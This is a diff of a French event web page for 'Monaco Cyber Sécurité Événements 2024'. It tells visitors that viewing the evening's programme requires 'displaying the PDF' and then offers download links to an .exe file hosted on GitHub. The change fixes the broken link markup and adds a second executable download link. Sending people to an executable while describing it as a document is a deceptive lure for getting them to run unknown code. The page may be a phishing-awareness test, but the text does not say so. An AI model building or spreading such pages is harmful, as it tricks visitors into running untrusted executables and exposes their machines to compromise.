--- a/index.html
+++ b/index.html
@@ -61,13 +61,11 @@
     </style>
 </head>
 <body>
-    <div class="banner">
-        Monaco Cyber Sécurité Événements 2024
-    </div>
-    <h1>Afin de visualiser les événements de cette soirée veuillez afficher le PDF</h1>
-    <p>Que la fête commence !</p>
-    <a class="download-btn" <a href="https://github.com/sndcrt/site-web-/raw/main/testmcs-compress%C3%A9.exe" download>Télécharger le fichier</a>
-<a href="https://github.com/sndcrt/site-web-/raw/refs/heads/main/testmcs-compress%C3%A9.exe"</a>
+   </div>
+<h1>Afin de visualiser les événements de cette soirée, veuillez afficher le PDF</h1>
+<p>Que la fête commence !</p>
+<a class="download-btn" href="https://github.com/sndcrt/site-web-/raw/main/testmcs-compress%C3%A9.exe" download>Télécharger le fichier EXE</a>
+<a href="https://github.com/sndcrt/site-web-/raw/refs/heads/main/testmcs-compress%C3%A9.exe" download>Télécharger le fichier EXE (autre lien)</a>
 
 
     <script>
